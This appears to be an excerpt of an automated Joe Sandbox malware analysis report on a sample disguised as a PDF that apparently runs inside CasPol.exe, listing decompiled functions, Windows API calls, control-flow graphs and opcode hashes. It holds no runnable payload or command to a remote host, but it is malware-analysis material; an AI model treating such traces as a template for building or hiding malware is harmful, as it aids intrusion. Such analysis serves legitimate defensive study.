                                                                      • Associated: 00000002.00000002.167633578927.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633608441.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405D4C Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00405D4C(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                      0x00405d5c
                                                                      0x00405d5e
                                                                      0x00405d61
                                                                      0x00405d8d
                                                                      0x00405d66
                                                                      0x00405d6f
                                                                      0x00405d74
                                                                      0x00405d7f
                                                                      0x00405d82
                                                                      0x00405d9e
                                                                      0x00405d84
                                                                      0x00405d8b
                                                                      0x00000000
                                                                      0x00405d8b
                                                                      0x00405d97
                                                                      0x00405d9b
                                                                      0x00405d9b
                                                                      0x00405d95
                                                                      0x00000000

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D74
                                                                      • CharNextA.USER32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D85
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                                      • Instruction ID: 1f72a7e7db10584d46f5d47bab472a29a69204e410489cb336b3e0253d2e012c
                                                                      • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                                      • Instruction Fuzzy Hash: 31F09631104918FFC712DFA5DD0499FBBA8EF06350B2580BAE841F7251D674DE019F99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:7.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:21
                                                                      Total number of Limit Nodes:1
                                                                      execution_graph 2531 1910221 2532 1910254 2531->2532 2534 19102a9 2531->2534 2535 19102c3 2534->2535 2536 191030a 2535->2536 2539 166a1f4 2535->2539 2543 166a23a 2535->2543 2536->2532 2541 166a23a GetConsoleOutputCP 2539->2541 2542 166a278 2541->2542 2542->2536 2544 166a263 GetConsoleOutputCP 2543->2544 2545 166a28c 2543->2545 2546 166a278 2544->2546 2545->2544 2546->2536 2547 1910230 2548 1910254 2547->2548 2549 19102a9 2 API calls 2547->2549 2549->2548 2550 166a4de 2553 166a513 WriteFile 2550->2553 2552 166a545 2553->2552 2554 166a4aa 2556 166a4de WriteFile 2554->2556 2557 166a545 2556->2557

                                                                      Callgraph

                                                                      • Executed
                                                                      • Not Executed
                                                                      • Opacity -> Relevance
                                                                      • Disassembly available
                                                                      callgraph 0 Function_01662364 1 Function_01662264 2 Function_01930710 3 Function_0166A3E3 4 Function_0193009B 5 Function_0191029B 6 Function_0166A36A 7 Function_016623F4 8 Function_0166A1F4 9 Function_01930000 10 Function_0166A172 11 Function_01930606 12 Function_016621F0 13 Function_01910006 14 Function_0166A078 15 Function_019104B0 15->11 15->15 27 Function_01912E28 15->27 33 Function_019305DF 15->33 16 Function_01910230 16->7 16->11 16->15 22 Function_019104A0 16->22 24 Function_019102A9 16->24 16->33 47 Function_019103F8 16->47 17 Function_01662044 18 Function_01910938 19 Function_019305BF 20 Function_0166A2CA 21 Function_01910221 21->7 21->11 21->15 21->22 21->24 21->33 21->47 22->11 22->15 22->27 22->33 23 Function_016620D0 24->8 41 Function_0166A23A 24->41 25 Function_019103A9 26 Function_0166A4DE 27->11 27->15 27->18 27->27 27->33 49 Function_01912F60 27->49 28 Function_01662458 29 Function_016628D9 30 Function_0166A2A3 31 Function_0166A120 32 Function_0166A02E 34 Function_0166A4AA 35 Function_0166A336 36 Function_016622B4 37 Function_01662430 38 Function_016623BC 39 Function_0166213C 40 Function_01930648 52 Function_0193066A 40->52 42 Function_0193004F 43 Function_019305CF 44 Function_0166A43A 45 Function_01662939 46 Function_0166A005 48 Function_0193067F 49->15 49->18 50 Function_01662194 51 Function_01662310 53 Function_0166201C 54 Function_0166A09A 55 Function_0193026D 56 Function_01662098 57 Function_0166A418

                                                                      Executed Functions

                                                                      Function 019104B0 Relevance: 3.9, Strings: 1, Instructions: 2633COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 19104b0-19104cd 2 1910590-19105d5 0->2 3 19104d3-19104f1 0->3 6 19105db-19105e0 2->6 7 191088a-1910891 2->7 8 19104f7-19104fa 3->8 9 191058b-191058f 3->9 642 19105e3 call 1930606 6->642 643 19105e3 call 19305df 6->643 10 1910893-19108f1 call 19104b0 7->10 11 19108f6-19108fd 7->11 8->2 12 1910500-1910528 8->12 10->11 14 1910917-191091e 11->14 15 19108ff-1910912 call 19104b0 11->15 52 1910530-191053e 12->52 13 19105e9-19105ed 16 19105f3-19105f6 13->16 17 1910776-191077a 13->17 15->14 22 19105fc-1910604 16->22 23 191091f-1910959 16->23 20 1910881-1910884 17->20 21 1910780-1910796 17->21 20->6 20->7 45 1910798 21->45 46 191079d-19107d2 21->46 26 1910606-191060a 22->26 27 1910659-1910665 22->27 38 1912e06-1912e11 23->38 39 191095f-1912dfb 23->39 26->23 32 1910610-1910615 26->32 27->23 40 191066b-1910681 27->40 32->27 33 1910617-1910652 32->33 33->27 39->38 53 1910761-1910770 40->53 54 1910687-1910693 40->54 45->46 72 19107d4-19107f4 46->72 73 1910809-191081e 46->73 55 1910581-1910585 52->55 56 1910540-1910547 52->56 53->16 53->17 64 19106b0-19106c5 54->64 65 1910695-191075f 54->65 55->8 55->9 56->55 63 1910549-191057b 56->63 63->55 82 191074b-1910750 64->82 83 19106cb-19106d6 64->83 65->17 645 19107f6 call 1930606 72->645 646 19107f6 call 19305df 72->646 90 1910820-191082b 73->90 91 1910877-191087c 73->91 82->14 94 19106e9-19106fc 83->94 95 19106d8-19106e7 83->95 102 191082d-191083c 90->102 103 191083e-1910851 90->103 91->14 106 19106fe-1910743 94->106 95->94 95->106 96 19107fc-1910801 call 1912e28 105 1910807 96->105 102->103 112 1910853-191086f 102->112 103->112 105->20 106->82 112->91 642->13 643->13 645->96 646->96
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167505560374.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_1910000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: _`l
                                                                      • API String ID: 0-1833315887
                                                                      • Opcode ID: 57abf4e43d9da2032cd75cfddffa86e13da3a1e8a7e80aa434ba86857c028889
                                                                      • Instruction ID: 68a2812c74393a3c74d5823a40534848743447beadb9add3c2cd91e1bfb70cb8
                                                                      • Opcode Fuzzy Hash: 57abf4e43d9da2032cd75cfddffa86e13da3a1e8a7e80aa434ba86857c028889
                                                                      • Instruction Fuzzy Hash: C1438B747042098FC714DF28D894A9AB7B3FF89308F14859DE4099B358CB76AD8ADF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01912F60 Relevance: 3.6, Strings: 1, Instructions: 2324COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 647 1912f60-1912f94 call 19104b0 652 1912fb3-1913007 call 19104b0 call 1910938 647->652 653 1912f96-1912fa9 call 19104b0 647->653 667 19131d7-19131dd 652->667 668 191300d-1913015 call 1910938 652->668 657 1912fae 653->657 659 1913392-1913399 657->659 667->659 669 19131e3-191321c call 19104b0 667->669 673 191301b-1913023 668->673 674 191339c-19133c7 668->674 697 1913282-19132bb call 19104b0 669->697 698 191321e-1913222 669->698 675 1913029-1913031 call 1910938 673->675 676 19131c8-19131d1 call 1910938 673->676 675->674 685 1913037-191303f 675->685 676->667 676->668 685->676 687 1913045-191304f 685->687 689 1913051-1913053 687->689 690 1913055-191305b 687->690 691 1913063-1913065 689->691 690->691 692 1913067-191306f call 1910938 691->692 693 191308e-1913099 call 1910938 691->693 692->674 703 1913075-1913088 692->703 704 1913197-191319f call 1910938 693->704 705 191309f-19130a7 call 1910938 693->705 697->659 737 19132c1-19132ca 697->737 701 1913224-191322d 698->701 702 1913248-1913256 698->702 701->674 711 1913233-1913246 701->711 702->674 712 191325c-1913271 702->712 703->676 703->693 704->674 717 19131a5-19131c3 call 19104b0 704->717 705->674 718 19130ad-19130b5 705->718 711->702 723 1913276-1913280 711->723 712->723 717->676 719 1913188-1913191 call 1910938 718->719 720 19130bb-19130c3 call 1910938 718->720 719->704 719->705 720->674 733 19130c9-19130d1 720->733 723->697 723->698 733->719 734 19130d7-19130df call 1910938 733->734 734->674 739 19130e5-19130f4 call 1910938 734->739 737->674 742 19132d0-19132d8 737->742 739->674 746 19130fa-191310c 739->746 744 1913382-191338c 742->744 745 19132de-19132e7 742->745 744->659 744->737 745->674 750 19132ed-19132f5 745->750 746->719 751 191310e-1913122 746->751 752 19132f7-1913306 750->752 753 191335d-1913366 750->753 757 1913124-1913126 751->757 758 1913128 751->758 752->674 759 191330c-1913344 call 19104b0 752->759 753->674 760 1913368-191337d 753->760 761 191312b-1913166 call 1910938 757->761 758->761 759->674 771 1913346-191335b call 19104b0 759->771 760->744 761->674 775 191316c-1913183 call 19104b0 761->775 771->744 775->719
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167505560374.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_1910000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :@[l
                                                                      • API String ID: 0-3540247541
                                                                      • Opcode ID: 70cc2fb14c100ed3d9aa7889b8efd3e8e4d6911b93ce30aa38698d6e95a45603
                                                                      • Instruction ID: afe49c8b181e8e8d00e9d0c8fd3f44f3b689ebfc03e4cfa7d7a511ccc0f77124
                                                                      • Opcode Fuzzy Hash: 70cc2fb14c100ed3d9aa7889b8efd3e8e4d6911b93ce30aa38698d6e95a45603
                                                                      • Instruction Fuzzy Hash: 93D1C234600209CFCB15DF64C998A5DBBB2FF84314F0AC499E90A9B36ACB35ED85CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0166A1F4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 781 166a1f4-166a261 783 166a263-166a276 GetConsoleOutputCP 781->783 784 166a28c-166a291 781->784 785 166a293-166a298 783->785 786 166a278-166a28b 783->786 784->783 785->786
                                                                      APIs
                                                                      • GetConsoleOutputCP.KERNELBASE ref: 0166A269
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167504998444.000000000166A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166A000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_166a000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleOutput
                                                                      • String ID: Z
                                                                      • API String ID: 3985236979-1505515367
                                                                      • Opcode ID: aad5bd597102743b9d4197606af2837fdd4bebc82145fc59aca47b88eac725ae
                                                                      • Instruction ID: 09938215a25dc76865c747cb1a8bc1e6997f83bc00d741ce437df132ca981836
                                                                      • Opcode Fuzzy Hash: aad5bd597102743b9d4197606af2837fdd4bebc82145fc59aca47b88eac725ae
                                                                      • Instruction Fuzzy Hash: 4A21797540D7C05FDB138B65DC94692BFB4EF43220F0E80DBD9848F2A3D269A909DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0166A4AA Relevance: 1.6, APIs: 1, Instructions: 79fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 789 166a4aa-166a535 793 166a537-166a557 WriteFile 789->793 794 166a579-166a57e 789->794 797 166a580-166a585 793->797 798 166a559-166a576 793->798 794->793 797->798
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(?,00000E24,D03D9DD5,00000000,00000000,00000000,00000000), ref: 0166A53D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167504998444.000000000166A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166A000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_166a000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 5a96ec9063eb2ae953fbd8ede54cec633906c6e01f150ff8d683d92da357e5ff
                                                                      • Instruction ID: a7420563d8a12e86dcde48337ca1803c6208cf2bcd40803afb6e2b020b503a45
                                                                      • Opcode Fuzzy Hash: 5a96ec9063eb2ae953fbd8ede54cec633906c6e01f150ff8d683d92da357e5ff
                                                                      • Instruction Fuzzy Hash: 70219F71409380AFDB22CB61DC54B96BFB8EF06310F0984DBE9849B1A3D364A409CB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0166A4DE Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 801 166a4de-166a535 804 166a537-166a53f WriteFile 801->804 805 166a579-166a57e 801->805 806 166a545-166a557 804->806 805->804 808 166a580-166a585 806->808 809 166a559-166a576 806->809 808->809
                                                                      APIs
                                                                      • WriteFile.KERNELBASE(?,00000E24,D03D9DD5,00000000,00000000,00000000,00000000), ref: 0166A53D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167504998444.000000000166A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166A000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_166a000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: 7220b09eab90d749aef904f15e14a91a141131e64052e51923afdee9cede477c
                                                                      • Instruction ID: 36897aeeab934655cc0fdd790a62c99362946a313a5d87e83ac97684d2588135
                                                                      • Opcode Fuzzy Hash: 7220b09eab90d749aef904f15e14a91a141131e64052e51923afdee9cede477c
                                                                      • Instruction Fuzzy Hash: E111C1B2404240EFEB22CF95DD45F6AFBE8EF04324F04845AEA459B256D3B5A444CBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0166A23A Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 812 166a23a-166a261 813 166a263-166a276 GetConsoleOutputCP 812->813 814 166a28c-166a291 812->814 815 166a293-166a298 813->815 816 166a278-166a28b 813->816 814->813 815->816
                                                                      APIs
                                                                      • GetConsoleOutputCP.KERNELBASE ref: 0166A269
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167504998444.000000000166A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0166A000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_166a000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleOutput
                                                                      • String ID:
                                                                      • API String ID: 3985236979-0
                                                                      • Opcode ID: 9d15eda58de3e4501d92ff1e9136e280811aa5aa0519310346a795e54a9f7820
                                                                      • Instruction ID: 807981987ba9772a01d7bcd0545fa9d323e5584c7e3496d8ab8e51633c9036f1
                                                                      • Opcode Fuzzy Hash: 9d15eda58de3e4501d92ff1e9136e280811aa5aa0519310346a795e54a9f7820
                                                                      • Instruction Fuzzy Hash: 77F0C2759442848FDB11CF46DC85761FBE8EF04624F0CC09ADE094F356D3BAA444CAA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 019104A0 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 819 19104a0-19104cd 821 1910590-19105d5 819->821 822 19104d3-19104f1 819->822 825 19105db-19105e0 821->825 826 191088a-1910891 821->826 827 19104f7-19104fa 822->827 828 191058b-191058f 822->828 1463 19105e3 call 1930606 825->1463 1464 19105e3 call 19305df 825->1464 829 1910893-19108f1 call 19104b0 826->829 830 19108f6-19108fd 826->830 827->821 831 1910500-1910528 827->831 829->830 833 1910917-191091e 830->833 834 19108ff-1910912 call 19104b0 830->834 871 1910530-191053e 831->871 832 19105e9-19105ed 835 19105f3-19105f6 832->835 836 1910776-191077a 832->836 834->833 841 19105fc-1910604 835->841 842 191091f-1910959 835->842 839 1910881-1910884 836->839 840 1910780-1910796 836->840 839->825 839->826 864 1910798 840->864 865 191079d-19107d2 840->865 845 1910606-191060a 841->845 846 1910659-1910665 841->846 857 1912e06-1912e11 842->857 858 191095f-1912dfb 842->858 845->842 851 1910610-1910615 845->851 846->842 859 191066b-1910681 846->859 851->846 852 1910617-1910652 851->852 852->846 858->857 872 1910761-1910770 859->872 873 1910687-1910693 859->873 864->865 891 19107d4-19107f4 865->891 892 1910809-191081e 865->892 874 1910581-1910585 871->874 875 1910540-1910547 871->875 872->835 872->836 883 19106b0-19106c5 873->883 884 1910695-191075f 873->884 874->827 874->828 875->874 882 1910549-191057b 875->882 882->874 901 191074b-1910750 883->901 902 19106cb-19106d6 883->902 884->836 1461 19107f6 call 1930606 891->1461 1462 19107f6 call 19305df 891->1462 909 1910820-191082b 892->909 910 1910877-191087c 892->910 901->833 913 19106e9-19106fc 902->913 914 19106d8-19106e7 902->914 921 191082d-191083c 909->921 922 191083e-1910851 909->922 910->833 925 19106fe-1910743 913->925 914->913 914->925 915 19107fc-1910801 call 1912e28 924 1910807 915->924 921->922 931 1910853-191086f 921->931 922->931 924->839 925->901 931->910 1461->915 1462->915 1463->832 1464->832
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167505560374.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_1910000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: _`l
                                                                      • API String ID: 0-1833315887
                                                                      • Opcode ID: e892657538c06ee0301ab3ed212de6543a9aaff0244409cee05b3800a43b8a6d
                                                                      • Instruction ID: b689dd95a33a0f76d8f81cc1930011c98f0c77b5801a05d9a2a916fbcb8708f7
                                                                      • Opcode Fuzzy Hash: e892657538c06ee0301ab3ed212de6543a9aaff0244409cee05b3800a43b8a6d
                                                                      • Instruction Fuzzy Hash: 2E219F306002158FC7199F39D84C65A7BE1BB85315F1985BAE409CF765DB35DCCACB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01912E28 Relevance: .1, Instructions: 137COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1466 1912e28-1912e41 1468 1912e43-1912e4b 1466->1468 1469 1912e4c-1912e57 call 1910938 1466->1469 1472 1912e59-1912e61 call 1910938 1469->1472 1473 1912e98-1912ea0 1469->1473 1476 1912ea1-1912f24 1472->1476 1477 1912e63-1912e75 1472->1477 1631 1912f26 call 1912f60 1476->1631 1632 1912f26 call 1930606 1476->1632 1633 1912f26 call 1912e28 1476->1633 1634 1912f26 call 19305df 1476->1634 1480 1912e77-1912e7f call 1910938 1477->1480 1481 1912e8d-1912e96 call 1910938 1477->1481 1480->1476 1488 1912e81-1912e8c 1480->1488 1481->1472 1481->1473 1493 1912f2c-1912f94 call 19104b0 1502 1912fb3-1913007 call 19104b0 call 1910938 1493->1502 1503 1912f96-1912fa9 call 19104b0 1493->1503 1517 19131d7-19131dd 1502->1517 1518 191300d-1913015 call 1910938 1502->1518 1507 1912fae 1503->1507 1509 1913392-1913399 1507->1509 1517->1509 1519 19131e3-191321c call 19104b0 1517->1519 1523 191301b-1913023 1518->1523 1524 191339c-19133c7 1518->1524 1547 1913282-19132bb call 19104b0 1519->1547 1548 191321e-1913222 1519->1548 1525 1913029-1913031 call 1910938 1523->1525 1526 19131c8-19131d1 call 1910938 1523->1526 1525->1524 1535 1913037-191303f 1525->1535 1526->1517 1526->1518 1535->1526 1537 1913045-191304f 1535->1537 1539 1913051-1913053 1537->1539 1540 1913055-191305b 1537->1540 1541 1913063-1913065 1539->1541 1540->1541 1542 1913067-191306f call 1910938 1541->1542 1543 191308e-1913099 call 1910938 1541->1543 1542->1524 1553 1913075-1913088 1542->1553 1554 1913197-191319f call 1910938 1543->1554 1555 191309f-19130a7 call 1910938 1543->1555 1547->1509 1587 19132c1-19132ca 1547->1587 1551 1913224-191322d 1548->1551 1552 1913248-1913256 1548->1552 1551->1524 1561 1913233-1913246 1551->1561 1552->1524 1562 191325c-1913271 1552->1562 1553->1526 1553->1543 1554->1524 1567 19131a5-19131c3 call 19104b0 1554->1567 1555->1524 1568 19130ad-19130b5 1555->1568 1561->1552 1573 1913276-1913280 1561->1573 1562->1573 1567->1526 1569 1913188-1913191 call 1910938 1568->1569 1570 19130bb-19130c3 call 1910938 1568->1570 1569->1554 1569->1555 1570->1524 1583 19130c9-19130d1 1570->1583 1573->1547 1573->1548 1583->1569 1584 19130d7-19130df call 1910938 1583->1584 1584->1524 1589 19130e5-19130f4 call 1910938 1584->1589 1587->1524 1592 19132d0-19132d8 1587->1592 1589->1524 1596 19130fa-191310c 1589->1596 1594 1913382-191338c 1592->1594 1595 19132de-19132e7 1592->1595 1594->1509 1594->1587 1595->1524 1600 19132ed-19132f5 1595->1600 1596->1569 1601 191310e-1913122 1596->1601 1602 19132f7-1913306 1600->1602 1603 191335d-1913366 1600->1603 1607 1913124-1913126 1601->1607 1608 1913128 1601->1608 1602->1524 1609 191330c-1913344 call 19104b0 1602->1609 1603->1524 1610 1913368-191337d 1603->1610 1611 191312b-1913166 call 1910938 1607->1611 1608->1611 1609->1524 1621 1913346-191335b call 19104b0 1609->1621 1610->1594 1611->1524 1625 191316c-1913183 call 19104b0 1611->1625 1621->1594 1625->1569 1631->1493 1632->1493 1633->1493 1634->1493
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167505560374.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_1910000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94ca82ad66e418498d0f59881198303c10a1fe834c4a7b36e9106a3169b87ee0
                                                                      • Instruction ID: b6e0a2d86e1cfcb66a734b126c3d26bfc030e9a2781177f14d7341e12b97364d
                                                                      • Opcode Fuzzy Hash: 94ca82ad66e418498d0f59881198303c10a1fe834c4a7b36e9106a3169b87ee0
                                                                      • Instruction Fuzzy Hash: 02414835B042098FCB15EB78D8546AEBBB2FFC5314F15806AE849DB351CB359C85CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 019305DF Relevance: .1, Instructions: 91COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1635 19305df-19305e3 1636 1930566-19305be 1635->1636 1637 19305e5-1930620 1635->1637 1640 1930626-1930643 1637->1640
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167505627694.0000000001930000.00000040.00000020.00020000.00000000.sdmp, Offset: 01930000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_1930000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9a33a40cacab3d4bd26040bc9fc12bd5f839ebc51a915cd5a8a7ff86e3cb2a97
                                                                      • Instruction ID: e202f218437644832762b5981fb64343c7f6f11f162d1ed6106d88dd3045399a
                                                                      • Opcode Fuzzy Hash: 9a33a40cacab3d4bd26040bc9fc12bd5f839ebc51a915cd5a8a7ff86e3cb2a97
                                                                      • Instruction Fuzzy Hash: B50128B25093806FC7128B26EC45863BFB8DB86620709C4DFF94D8B653D265A909C7B2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 019102A9 Relevance: .1, Instructions: 82COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1641 19102a9-19102ff 1649 19103a2-19103a6 1641->1649 1650 1910305 1641->1650 1668 1910305 call 166a1f4 1650->1668 1669 1910305 call 166a23a 1650->1669 1651 191030a 1652 1910311-1910338 1651->1652 1652->1649 1657 191033a-191036d 1652->1657 1657->1649 1664 191036f-191039b 1657->1664 1664->1649 1668->1651 1669->1651
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.167505560374.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_1910000_CasPol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a76e9e0487a86c8104f401f437e729a5592c9615ba79abf6f287f6b5dde297b9
                                                                      • Instruction ID: e9946763193762e0271df2e7854a18855d8211c91cd792cd30b342633c8cfbab
                                                                      • Opcode Fuzzy Hash: a76e9e0487a86c8104f401f437e729a5592c9615ba79abf6f287f6b5dde297b9
                                                                      • Instruction Fuzzy Hash: F6215E317002048FCB14ABB9C11CAAE37E6AFCA209B1544BDD00ACBBA5DF36DC459B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 019103F8 Relevance: .1, Instructions: 58COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1670 19103f8-1910422 1672 1910424-1910426 1670->1672 1673 1910428 1670->1673 1674 191042b-1910443 1672->1674 1673->1674 1676 1910448-191049b 1674->1676
